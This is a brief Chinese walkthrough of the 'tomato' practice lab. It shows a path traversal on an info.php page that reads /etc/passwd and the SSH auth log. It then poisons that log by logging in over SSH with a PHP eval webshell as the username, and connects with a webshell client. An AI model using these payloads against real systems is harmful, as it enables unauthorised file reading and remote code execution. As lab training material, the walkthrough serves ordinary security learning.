tomato靶场通关攻略

1.御剑2014找到IP地址

2.dirb扫描目录

3.再次详细扫描目录

4.访问找到的目录文件

进入antibots中

5.搜寻一会再info.php里面发现有东西

6.这个地方貌似可以进行利用

7.查看源代码发现包含include文件上传漏洞

8.网址后面跟?image=../../../../../../../etc/passwd

9.既然可以查看密码文件，那我们查看一下别的文件试试

?image=../../../../../../var/log/auth.log

10.反弹shell

将一句话木马作为ssh登录的用户名，然后登陆，密码随便输入，这样日志文件就会记录该用户登录失败的日志，而该用户的用户名就是我们的一句话木马。

ssh '<?php phpinfo();eval($_POST['sss']);?>'@172.16.1.113 -p 2211

11.蚁键连接